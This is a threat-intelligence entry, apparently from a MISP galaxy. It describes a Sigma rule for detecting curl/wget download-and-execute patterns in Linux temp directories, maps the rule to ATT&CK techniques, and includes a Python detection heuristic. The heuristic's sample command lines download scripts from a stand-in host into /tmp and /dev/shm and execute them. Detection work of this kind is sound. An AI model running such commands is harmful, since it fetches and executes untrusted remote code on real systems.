
Suspicious Download and Execute Pattern via Curl/Wget (a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa)

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
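The pattern described above, as an added illustration that is not the Sigma rule's own selection logic (which is not reproduced on this page): a small heuristic that splits a Linux process command line into its shell stages and flags a curl/wget download into a temp directory that is followed by execution from one. The temp-directory, downloader and interpreter lists, and the sample command lines, are constructed assumptions.

```python
import os
import re

# Heuristic reconstruction of the pattern described above; the real Sigma
# rule's selection logic is not on this page, so these lists are assumptions.
TEMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
# Shell command lines are split into stages at &&, ||, ; and |
_STAGE_SPLIT = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")

def _touches_temp(stage: str) -> bool:
    return any(d in stage for d in TEMP_DIRS)

def _is_download_to_temp(stage: str) -> bool:
    tokens = stage.split()
    return bool(tokens) and os.path.basename(tokens[0]) in DOWNLOADERS and _touches_temp(stage)

def _is_exec_from_temp(stage: str) -> bool:
    tokens = stage.split()
    if not tokens:
        return False
    # "/tmp/payload" run directly, or "bash /tmp/payload.sh"
    if tokens[0].startswith(TEMP_DIRS):
        return True
    return os.path.basename(tokens[0]) in INTERPRETERS and _touches_temp(stage)

def is_download_and_execute(cmdline: str) -> bool:
    """True when a curl/wget download into a temp dir is followed, in the same
    command line, by execution of something from a temp dir."""
    stages = [s for s in _STAGE_SPLIT.split(cmdline) if s.strip()]
    for i, stage in enumerate(stages):
        if _is_download_to_temp(stage):
            return any(_is_exec_from_temp(later) for later in stages[i + 1:])
    return False

def flag_suspicious(cmdlines: list[str]) -> list[str]:
    """Return the process command lines that match the pattern."""
    return [c for c in cmdlines if is_download_and_execute(c)]

# Constructed sample process command lines (not real telemetry)
SAMPLE_CMDLINES = [
    "curl -s http://example.invalid/a.sh -o /tmp/a.sh && bash /tmp/a.sh",
    "wget -q -O /dev/shm/.x http://example.invalid/x; chmod +x /dev/shm/.x; /dev/shm/.x",
    "curl -fsSL https://example.invalid/release.tar.gz -o /tmp/release.tar.gz",
    "bash /tmp/a.sh",
]
```

A download-only line and an execute-only line are left unflagged on purpose; the rule's value lies in the two stages appearing together in one command line.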

| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| Suspicious Download and Execute Pattern via Curl/Wget (a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa) | Sigma-Rules | Unix Shell - T1059.004 (a9d4b653-6915-42af-98b2-5758c4ceee56) | Attack Pattern | 1 |
| Suspicious Download and Execute Pattern via Curl/Wget (a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa) | Sigma-Rules | Exploitation for Client Execution - T1203 (be2dcee9-a7a7-4e38-afd6-21b31ecc3d63) | Attack Pattern | 1 |
| Unix Shell - T1059.004 (a9d4b653-6915-42af-98b2-5758c4ceee56) | Attack Pattern | Command and Scripting Interpreter - T1059 (7385dfaf-6886-4229-9ecd-6fd678040830) | Attack Pattern | 2 |